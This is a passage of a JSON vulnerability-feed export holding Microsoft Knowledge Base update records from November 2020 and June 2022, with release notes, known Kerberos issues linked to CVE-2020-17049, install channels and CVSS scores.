[CVE-2020-17049](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-17049>) was addressed in these updates.For specific symptoms and behaviors related to this issue, please see the [Windows release health](<https://docs.microsoft.com/windows/release-information/status-windows-8.1-and-windows-server-2012-r2#1522msgdesc>) page. **Note **This issue only affects Windows Servers, Windows 10 devices and applications in enterprise environments.| This issue is resolved in [KB4594439](<https://support.microsoft.com/help/4594439>). \n \n## How to get this update\n\n**Before installing this update**We strongly recommend that you install the latest servicing stack update (SSU) for your operating system before you install the latest Rollup. SSUs improve the reliability of the update process to mitigate potential issues while installing the Rollup and applying Microsoft security fixes. For general information about SSUs, see [Servicing stack updates](<https://docs.microsoft.com/en-us/windows/deployment/update/servicing-stack-updates>) and [Servicing Stack Updates (SSU): Frequently Asked Questions](<https://support.microsoft.com/help/4535697>).If you use Windows Update, the latest SSU ([KB4566425](<https://support.microsoft.com/help/4566425>)) will be offered to you automatically. To get the standalone package for the latest SSU, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>). **Install this update****Release Channel**| **Available**| **Next Step** \n---|---|--- \nWindows Update and Microsoft Update| Yes| None. This update will be downloaded and installed automatically from Windows Update. \nMicrosoft Update Catalog| Yes| To get the standalone package for this update, go to the [Microsoft Update Catalog](<https://www.catalog.update.microsoft.com/Search.aspx?q=KB4586845>) website. \nWindows Server Update Services (WSUS)| Yes| This update will automatically sync with WSUS if you configure **Products and Classifications** as follows:**Product**: Windows 8.1, Windows Server 2012 R2, Windows Embedded 8.1 Industry Enterprise, Windows Embedded 8.1 Industry Pro**Classification**: Security Updates \n**File information**For a list of the files that are provided in this update, download the [file information for update 4586845](<https://download.microsoft.com/download/3/9/b/39bf949e-bdf1-45bd-aa1d-0a7568d0e3f2/4586845.csv>). \n", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.1, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-11-10T08:00:00", "type": "mskb", "title": "November 10, 2020\u2014KB4586845 (Monthly Rollup)", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-17049", "CVE-2020-17052"], "modified": "2020-11-10T08:00:00", "id": "KB4586845", "href": "https://support.microsoft.com/en-us/help/4586845", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-06-16T15:40:39", "description": "None\n## Improvements and fixes\n\nThis security update includes quality improvements. Key changes include:\n\n * Addresses an issue in which a principal in a trusted MIT realm fails to obtain a Kerberos service ticket from Active Directory domain controllers (DC). This occurs on devices that installed Windows Updates that contain CVE-2020-17049 protections and configured PerfromTicketSignature to 1 or higher. These updates were released between November 10, 2020 and December 8, 2020. Ticket acquisition also fails with the error, \u201cKRB_GENERIC_ERROR\u201d, if callers submit a PAC-less Ticket Granting Ticket (TGT) as an evidence ticket without providing the USER_NO_AUTH_DATA_REQUIRED flag.\n * Security updates to the Microsoft Scripting Engine, Windows App Platform and Frameworks, Windows Input and Composition, Windows Management, the Windows Cloud Infrastructure, Windows Fundamentals, Windows Authentication, the Windows Kernel, Windows Remote Desktop, and Windows Storage and Filesystems.\nIf you installed earlier updates, only the new fixes contained in this package will be downloaded and installed on your device.\n\n## How to get this update \n\n### Before installing this update \n\nMicrosoft now combines the latest servicing stack update (SSU) for your operating system with the hotpatch update. For general information about SSUs, see [Servicing stack updates](<https://docs.microsoft.com/en-us/windows/deployment/update/servicing-stack-updates>) and Servicing Stack Updates (SSU): Frequently Asked Questions.If you are using Windows Update or Windows Server Update Services (WSUS), the latest SSU will be installed with this update.\n\n### Install this update\n\nRelease Channel| Available| Next Step \n---|---|--- \nWindows Update| Yes| None. This update will be downloaded and installed automatically from Windows Update. \nMicrosoft Update Catalog| No| To get the standalone package for this update, go to the Microsoft Update Catalog website. \nWindows Server Update Services (WSUS)| Yes| This update will automatically sync with WSUS if you configure Products and Classifications as follows:Product: Windows Server 2022 Datacenter: Azure Edition HotpatchClassification: Security Updates \n \n## File information\n\nFor a list of the files that are provided in this update, download the [file information for cumulative update 5014677](<https://download.microsoft.com/download/b/1/a/b1ac4197-b142-41d2-b4c3-a545322bf8c6/5014678.csv>).For a list of the files that are provided in the servicing stack update, download the [file information for the SSU - version 20348.770](<https://download.microsoft.com/download/3/f/c/3fca8074-15f9-418b-9561-0f5f1e6798cb/SSU_version_20348_733.csv>).\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-14T07:00:00", "type": "mskb", "title": "June 14, 2022\u2014 KB5014677 (OS Build 20348.770)", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-17049", "CVE-2022-30166"], "modified": "2022-06-14T07:00:00", "id": "KB5014677", "href": "https://support.microsoft.com/en-us/help/5014677", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2021-12-31T15:44:23", "description": "None\n**IMPORTANT** Windows 8.1 and Windows Server 2012 R2 have reached the end of mainstream support and are now in extended support. Starting in July 2020, there will no longer be optional, non-security releases (known as \"C\" releases) for this operating system. Operating systems in extended support have only cumulative monthly security updates (known as the \"B\" or Update Tuesday release).\n\n**NEW 11/10/20** \nFor more information about the various types of Windows updates, such as critical, security, driver, service packs, and so on, please see the following [article](<https://support.microsoft.com/help/824684>). To view other notes and messages, see the Windows 8.1 and Windows Server 2012 R2 update history [home page](<https://support.microsoft.com/help/4009470>).\n\n## Improvements and fixes\n\nThis security update includes quality improvements. Key changes include:\n\n * Corrects the DST start date for the Fiji Islands to December 20, 2020.\n * Addresses a security vulnerability by preventing applications that run as a SYSTEM account from printing to local ports that point to a file. Failing print jobs log error 50, \u201cThe request is not supported.\u201d in event ID 372 in the PrintService\\Admin event log. To address this issue going forward, make sure your applications or services run as a specific user or service account.\n * Security updates to Windows Graphics, Windows Silicon Platform, Windows Authentication, Windows Core Networking, Windows Peripherals, Windows Network Security and Containers, Windows Hybrid Storage Services, and Windows Remote Desktop.\nFor more information about the resolved security vulnerabilities, please refer to the new [Security Update Guide](<https://msrc.microsoft.com/update-guide>) website.\n\n## Known issues in this update\n\n**Symptom**| **Workaround** \n---|--- \nCertain operations, such as **rename**, that you perform on files or folders that are on a Cluster Shared Volume (CSV) may fail with the error, \u201cSTATUS_BAD_IMPERSONATION_LEVEL (0xC00000A5)\u201d. This occurs when you perform the operation on a CSV owner node from a process that doesn\u2019t have administrator privilege.| Do one of the following:\n\n * Perform the operation from a process that has administrator privilege.\n * Perform the operation from a node that doesn\u2019t have CSV ownership.\nMicrosoft is working on a resolution and will provide an update in an upcoming release. \nAfter installing this update on domain controllers (DCs) and read-only domain controllers (RODCs) in your environment, you might encounter Kerberos authentication and ticket renewal issues. This is caused by an issue in how [CVE-2020-17049](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-17049>) was addressed in these updates.For specific symptoms and behaviors related to this issue, please see the [Windows release health](<https://docs.microsoft.com/windows/release-information/status-windows-8.1-and-windows-server-2012-r2#1522msgdesc>) page. **Note **This issue only affects Windows Servers, Windows 10 devices and applications in enterprise environments.| This issue is resolved in KB4594439. \n \n## How to get this update\n\n**Before installing this update**We strongly recommend that you install the latest servicing stack update (SSU) for your operating system before you install the latest Rollup. SSUs improve the reliability of the update process to mitigate potential issues while installing the Rollup and applying Microsoft security fixes. For general information about SSUs, see [Servicing stack updates](<https://docs.microsoft.com/en-us/windows/deployment/update/servicing-stack-updates>) and [Servicing Stack Updates (SSU): Frequently Asked Questions](<https://support.microsoft.com/help/4535697>).If you use Windows Update, the latest SSU ([KB4566425](<https://support.microsoft.com/help/4566425>)) will be offered to you automatically. To get the standalone package for the latest SSU, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>). \n\n**REMINDER** If you are using Security-only updates, you will also need to install all previous Security-only updates and the latest cumulative update for Internet Explorer ([KB4586768](<https://support.microsoft.com/help/4586768>)).\n\n**Install this update****Release Channel**| **Available**| **Next Step** \n---|---|--- \nWindows Update and Microsoft Update| No| See the other options below. \nMicrosoft Update Catalog| Yes| To get the standalone package for this update, go to the [Microsoft Update Catalog](<https://www.catalog.update.microsoft.com/Search.aspx?q=KB4586823>) website. \nWindows Server Update Services (WSUS)| Yes| This update will automatically sync with WSUS if you configure **Products and Classifications** as follows:**Product**: Windows 8.1, Windows Server 2012 R2, Windows Embedded 8.1 Industry Enterprise, Windows Embedded 8.1 Industry Pro**Classification**: Security Updates \n**File information**For a list of the files that are provided in this update, download the [file information for update 4586823](<https://download.microsoft.com/download/f/a/9/fa9ab938-dc38-44c6-84de-f5a964c3d8b2/4586823.csv>). \n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-11-10T08:00:00", "type": "mskb", "title": "November 10, 2020\u2014KB4586823 (Security-only update)", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-17049", "CVE-2020-17088"], "modified": "2020-11-10T08:00:00", "id": "KB4586823", "href": "https://support.microsoft.com/en-us/help/4586823", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-06-15T16:07:16", "description": "None\n**NEW 8/5/21 \nEXPIRATION NOTICE****IMPORTANT **As of 8/5/2021, this KB is no longer available from Windows Update, the Microsoft Update Catalog, or other release channels. We recommend that you update your devices to the latest security quality update. \n\n**NEW 11/10/20 \nIMPORTANT** Because of minimal operations during the holidays and the upcoming Western new year, there won\u2019t be a preview release (known as a \u201cC\u201d release) for the month of December 2020. There will be a monthly security release (known as a \u201cB\u201d release) for December 2020. Normal monthly servicing for both B and C releases will resume in January 2021.\n\n**UPDATED 11/10/20** \nFor more information about the various types of Windows updates, such as critical, security, driver, service packs, and so on, please see the following article. To view other notes and messages, see the Windows 10, version 1903 update history home page.**Note **Follow [@WindowsUpdate](<https://twitter.com/windowsupdate>) to find out when new content is published to the release information dashboard.\n\n## Highlights\n\n * Updates the 2020 DST start date for the Fiji Islands to December 20, 2020.\n * Updates to improve security when using Microsoft Office products.\n * Updates to improve security when using input devices such as a mouse, keyboard, or pen.\n * Updates to improve security when Windows performs basic operations.\n\n## Improvements and fixes\n\n## \n\n__\n\nWindows 10, version 1909\n\nThis security update includes quality improvements. Key changes include:\n\n * This build includes all the improvements from Windows 10, version 1903.\n * No additional issues were documented for this release.\n\n## \n\n__\n\nWindows 10, version 1903\n\n**Note **This release also contains updates for Microsoft HoloLens (OS Build 18362.1085) released November 10, 2020. Microsoft will release an update directly to the Windows Update Client to improve Windows Update reliability on Microsoft HoloLens that have not updated to this most recent OS Build.\n\nThis security update includes quality improvements. Key changes include:\n\n * Updates the 2020 DST start date for the Fiji Islands to December 20, 2020.\n * Addresses an issue with the package frame launcher (PSF) that passes a malformed parameter to a shim.\n * Addresses a security vulnerability by preventing applications that run as a SYSTEM account from printing to local ports that point to a file. Failing print jobs log error 50, \u201cThe request is not supported.\u201d in event ID 372 in the PrintService\\Admin event log. To address this issue in the future, make sure your applications or services run as a specific user or service account.\n * Security updates to the Microsoft Scripting Engine, the Microsoft Graphics Component, Windows Input and Composition, the Windows Wallet Service, Windows Fundamentals, and the Windows Kernel.\nIf you installed earlier updates, only the new fixes contained in this package will be downloaded and installed on your device.For more information about the resolved security vulnerabilities, please refer to the new [Security Update Guide](<https://msrc.microsoft.com/update-guide>) website.\n\n**Windows Update Improvements**Microsoft has released an update directly to the Windows Update client to improve reliability. Any device running Windows 10 configured to receive updates automatically from Windows Update, including Enterprise and Pro editions, will be offered the latest Windows 10 feature update based on device compatibility and Windows Update for Business deferral policy. This doesn't apply to long-term servicing editions.\n\n## Known issues in this update\n\n**Symptom**| **Workaround** \n---|--- \nSystem and user certificates might be lost when updating a device from Windows 10, version 1809 or later to a later version of Windows 10. Devices will only be impacted if they have already installed any Latest cumulative update (LCU) released September 16, 2020 or later and then proceed to update to a later version of Windows 10 from media or an installation source which does not have an LCU released October 13, 2020 or later integrated. This primarily happens when managed devices are updated using outdated bundles or media through an update management tool such as Windows Server Update Services (WSUS) or Microsoft Endpoint Configuration Manager. This might also happen when using outdated physical media or ISO images that do not have the latest updates integrated.**Note **Devices using Windows Update for Business or that connect directly to Windows Update are not impacted. Any device connecting to Windows Update should always receive the latest versions of the feature update, including the latest LCU, without any extra steps.| This issue is resolved in KB4592449. \nAfter installing this update on domain controllers (DCs) and read-only domain controllers (RODCs) in your environment, you might encounter Kerberos authentication and ticket renewal issues. This is caused by an issue in how [CVE-2020-17049](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-17049>) was addressed in these updates.For specific symptoms and behaviors related to this issue, please see the Windows release health page for [Windows Server, version 1909](<https://docs.microsoft.com/windows/release-information/status-windows-10-1909#1522msgdesc>) or [Windows Server, version 1903](<https://docs.microsoft.com/windows/release-information/status-windows-10-1903#1522msgdesc>). **Note **This issue only affects Windows Servers, Windows 10 devices and applications in enterprise environments.| This issue is resolved in KB4594443. \n \n## How to get this update\n\n**Before installing this update**Microsoft strongly recommends you install the latest servicing stack update (SSU) for your operating system before installing the latest cumulative update (LCU). SSUs improve the reliability of the update process to mitigate potential issues while installing the LCU and applying Microsoft security fixes. For general information about SSUs, see [Servicing stack updates](<https://docs.microsoft.com/en-us/windows/deployment/update/servicing-stack-updates>) and Servicing Stack Updates (SSU): Frequently Asked Questions.If you are using Windows Update, the latest SSU (KB4586863) will be offered to you automatically. To get the standalone package for the latest SSU, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>).**Install this update****Release Channel**| **Available**| **Next Step** \n---|---|--- \nWindows Update and Microsoft Update| Yes| None. This update will be downloaded and installed automatically from Windows Update. \nMicrosoft Update Catalog| Yes| To get the standalone package for this update, go to the [Microsoft Update Catalog](<https://www.catalog.update.microsoft.com/Search.aspx?q=KB4586786>) website. \nWindows Server Update Services (WSUS)| Yes| This update will automatically sync with WSUS if you configure **Products and Classifications** as follows:**Product**: Windows 10, version 1903 and later**Classification**: Security Updates \n**File information**For a list of the files that are provided in this update, download the [file information for cumulative update 4586786](<https://download.microsoft.com/download/b/f/d/bfd14412-228d-4d32-9445-baa32275c0d5/4586786.csv>). **Note** Some files erroneously have \u201cNot applicable\u201d in the \u201cFile version\u201d column of the CSV file. This might lead to false positives or false negatives when using some third-party scan detection tools to validate the build.\n", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.1, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-11-10T08:00:00", "type": "mskb", "title": "November 10, 2020\u2014KB4586786 (OS Builds 18362.1198 and 18363.1198) - EXPIRED", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-17049", "CVE-2020-17052"], "modified": "2020-11-10T08:00:00", "id": "KB4586786", "href": "https://support.microsoft.com/en-us/help/4586786", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2021-12-31T15:44:21", "description": "None\n**IMPORTANT** Windows Server 2012 has reached the end of mainstream support and is now in extended support. Starting in July 2020, there will no longer be optional releases (known as \"C\" or \"D\" releases) for this operating system. Operating systems in extended support have only cumulative monthly security updates (known as the \"B\" or Update Tuesday release).\n\n**NEW 11/10/20** \nFor more information about the various types of Windows updates, such as critical, security, driver, service packs, and so on, please see the following [article](<https://support.microsoft.com/help/824684>). To view other notes and messages, see the Windows Server 2012 update history [home page](<https://support.microsoft.com/help/4009471>).\n\n## Improvements and fixes\n\nThis security update includes quality improvements. Key changes include:\n\n * Corrects the DST start date for the Fiji Islands to December 20, 2020.\n * Addresses a security vulnerability by preventing applications that run as a SYSTEM account from printing to local ports that point to a file. Failing print jobs log error 50, \u201cThe request is not supported.\u201d in event ID 372 in the PrintService\\Admin event log. To address this issue going forward, make sure your applications or services run as a specific user or service account.\n * Security updates to Windows Graphics, Windows Silicon Platform, Windows Authentication, Windows Core Networking, Windows Peripherals, Windows Network Security and Containers, Windows Hybrid Storage Services, and Windows Remote Desktop.\nFor more information about the resolved security vulnerabilities, please refer to the [Security Update Guide](<https://portal.msrc.microsoft.com/security-guidance>).\n\n## Known issues in this update\n\n**Symptom**| **Workaround** \n---|--- \nCertain operations, such as **rename**, that you perform on files or folders that are on a Cluster Shared Volume (CSV) may fail with the error, \u201cSTATUS_BAD_IMPERSONATION_LEVEL (0xC00000A5)\u201d. This occurs when you perform the operation on a CSV owner node from a process that doesn\u2019t have administrator privilege.| Do one of the following:\n\n * Perform the operation from a process that has administrator privilege.\n * Perform the operation from a node that doesn\u2019t have CSV ownership.\nMicrosoft is working on a resolution and will provide an update in an upcoming release. \nAfter installing this update on domain controllers (DCs) and read-only domain controllers (RODCs) in your environment, you might encounter Kerberos authentication and ticket renewal issues. This is caused by an issue in how [CVE-2020-17049](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-17049>) was addressed in these updates.For specific symptoms and behaviors related to this issue, please see the [Windows release health](<https://docs.microsoft.com/windows/release-information/status-windows-server-2012#1522msgdesc>) page. **Note **This issue only affects Windows Servers, Windows 10 devices and applications in enterprise environments.| This issue is resolved in KB4594438. \n \n## How to get this update\n\n**Before installing this update**We strongly recommend that you install the latest servicing stack update (SSU) for your operating system before installing the latest Rollup. SSUs improve the reliability of the update process to mitigate potential issues while installing the Rollup and applying Microsoft security fixes. For general information about SSUs, see [Servicing stack updates](<https://docs.microsoft.com/en-us/windows/deployment/update/servicing-stack-updates>) and [Servicing Stack Updates (SSU): Frequently Asked Questions](<https://support.microsoft.com/help/4535697>).If you use Windows Update, the latest SSU ([KB4566426](<https://support.microsoft.com/help/4566426>)) will be offered to you automatically. To get the standalone package for the latest SSU, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>). \n\n**REMINDER** If you are using Security-only updates, you will also need to install all previous Security-only updates and the latest cumulative update for Internet Explorer ([KB4586768](<https://support.microsoft.com/help/4586768>)).\n\n**Install this update****Release Channel**| **Available**| **Next Step** \n---|---|--- \nWindows Update and Microsoft Update| No| See the other options below. \nMicrosoft Update Catalog| Yes| To get the standalone package for this update, go to the [Microsoft Update Catalog](<https://www.catalog.update.microsoft.com/Search.aspx?q=KB4586808>) website. \nWindows Server Update Services (WSUS)| Yes| This update will automatically sync with WSUS if you configure **Products and Classifications** as follows:**Product**: Windows Server 2012, Windows Embedded 8 Standard**Classification**: Security Update \n**File information**For a list of the files that are provided in this update, download the [file information for cumulative update 4586808](<https://download.microsoft.com/download/7/6/6/766e60b6-effb-432b-93ef-d280852cafe1/4586808.csv>).\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-11-10T08:00:00", "type": "mskb", "title": "November 10, 2020\u2014KB4586808 (Security-only update)", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-17049", "CVE-2020-17088"], "modified": "2020-11-10T08:00:00", "id": "KB4586808", "href": "https://support.microsoft.com/en-us/help/4586808", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-08-10T14:05:45", "description": "None\n**NEW 8/5/21 \nEXPIRATION NOTICE****IMPORTANT **As of 8/5/2021, this KB is no longer available from Windows Update, the Microsoft Update Catalog, or other release channels. We recommend that you update your devices to the latest security quality update. \n\n**NEW 11/10/20 \nIMPORTANT** Because of minimal operations during the holidays and the upcoming Western new year, there won\u2019t be a preview release (known as a \u201cC\u201d release) for the month of December 2020. There will be a monthly security release (known as a \u201cB\u201d release) for December 2020. Normal monthly servicing for both B and C releases will resume in January 2021.\n\n**Note **This release also contains updates for Microsoft HoloLens (OS Build 17763.1577) released November 10, 2020. Microsoft will release an update directly to the Windows Update Client to improve Windows Update reliability on Microsoft HoloLens that have not updated to this most recent OS Build.\n\n**UPDATED 11/10/20** \nFor more information about the various types of Windows updates, such as critical, security, driver, service packs, and so on, please see the following [article](<https://support.microsoft.com/en-us/help/824684/description-of-the-standard-terminology-that-is-used-to-describe-micro>). To view other notes and messages, see the Windows 10, version 1809 update history home page.\n\n## Highlights\n\n * Updates to improve security when using Microsoft Office products.\n * Updates to improve security when using input devices such as a mouse, keyboard, or pen.\n * Updates to improve security when Windows performs basic operations.\n * Updates the 2020 DST start date for the Fiji Islands to December 20, 2020.\n\n## Improvements and fixes\n\nThis security update includes quality improvements. Key changes include:\n\n * Updates the 2020 DST start date for the Fiji Islands to December 20, 2020.\n * Addresses a security vulnerability by preventing applications that run as a SYSTEM account from printing to local ports that point to a file. Failing print jobs log error 50, \u201cThe request is not supported.\u201d in event ID 372 in the PrintService\\Admin event log. To address this issue in the future, make sure your applications or services run as a specific user or service account.\n * Security updates to the Microsoft Scripting Engine, Microsoft Graphics Component, Windows Input and Composition, the Windows Wallet Service, Windows Fundamentals, and the Windows Kernel.\nIf you installed earlier updates, only the new fixes contained in this package will be downloaded and installed on your device.For more information about the resolved security vulnerabilities, please refer to the new [Security Update Guide](<https://msrc.microsoft.com/update-guide>) website.\n\n**Windows Update Improvements**Microsoft has released an update directly to the Windows Update client to improve reliability. Any device running Windows 10 configured to receive updates automatically from Windows Update, including Enterprise and Pro editions, will be offered the latest Windows 10 feature update based on device compatibility and Windows Update for Business deferral policy. This doesn't apply to long-term servicing editions.\n\n## Known issues in this update\n\n**Symptom**| **Workaround** \n---|--- \nAfter installing KB4493509, devices with some Asian language packs installed may receive the error, \"0x800f0982 - PSFX_E_MATCHING_COMPONENT_NOT_FOUND.\"| \n\n 1. Uninstall and reinstall any recently added language packs. For instructions, see Manage the input and display language settings in Windows 10.\n 2. Select **Check for Updates** and install the April 2019 Cumulative Update. For instructions, see Update Windows 10.\n**Note** If reinstalling the language pack does not mitigate the issue, reset your PC as follows:\n\n 1. Go to the **Settings **app > **Recovery**.\n 2. Select **Get Started** under the **Reset this PC** recovery option.\n 3. Select **Keep my Files**.\nMicrosoft is working on a resolution and will provide an update in an upcoming release. \nAfter installing this update on domain controllers (DCs) and read-only domain controllers (RODCs) in your environment, you might encounter Kerberos authentication and ticket renewal issues. This is caused by an issue in how [CVE-2020-17049](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-17049>) was addressed in these updates.For specific symptoms and behaviors related to this issue, please see the [Windows release health](<https://docs.microsoft.com/windows/release-information/status-windows-10-1809-and-windows-server-2019#1522msgdesc>) page. **Note **This issue only affects Windows Servers, Windows 10 devices and applications in enterprise environments.| This issue is resolved in KB4594442. \n \n## How to get this update\n\n**Before installing this update**Microsoft strongly recommends you install the latest servicing stack update (SSU) for your operating system before installing the latest cumulative update (LCU). SSUs improve the reliability of the update process to mitigate potential issues while installing the LCU and applying Microsoft security fixes. For general information about SSUs, see [Servicing stack updates](<https://docs.microsoft.com/en-us/windows/deployment/update/servicing-stack-updates>) and Servicing Stack Updates (SSU): Frequently Asked Questions.If you are using Windows Update, the latest SSU (KB4587735) will be offered to you automatically. To get the standalone package for the latest SSU, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>).**Install this update****Release Channel**| **Available**| **Next Step** \n---|---|--- \nWindows Update and Microsoft Update| Yes| None. This update will be downloaded and installed automatically from Windows Update. \nMicrosoft Update Catalog| Yes| To get the standalone package for this update, go to the [Microsoft Update Catalog](<https://www.catalog.update.microsoft.com/Search.aspx?q=KB4586793>) website. \nWindows Server Update Services (WSUS)| Yes| This update will automatically sync with WSUS if you configure **Products and Classifications** as follows:**Product**: Windows 10**Classification**: Security Updates \n**File information**For a list of the files that are provided in this update, download the [file information for cumulative update 4586793](<https://download.microsoft.com/download/a/e/e/aeef4e7a-b08d-4da9-b19f-62054aca9811/4586793.csv>).**Note** Some files erroneously have \u201cNot applicable\u201d in the \u201cFile version\u201d column of the CSV file. This might lead to false positives or false negatives when using some third-party scan detection tools to validate the build.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-11-10T08:00:00", "type": "mskb", "title": "November 10, 2020\u2014KB4586793 (OS Build 17763.1577) - EXPIRED", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-17049", "CVE-2020-17087"], "modified": "2020-11-10T08:00:00", "id": "KB4586793", "href": "https://support.microsoft.com/en-us/help/4586793", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-08-10T14:05:51", "description": 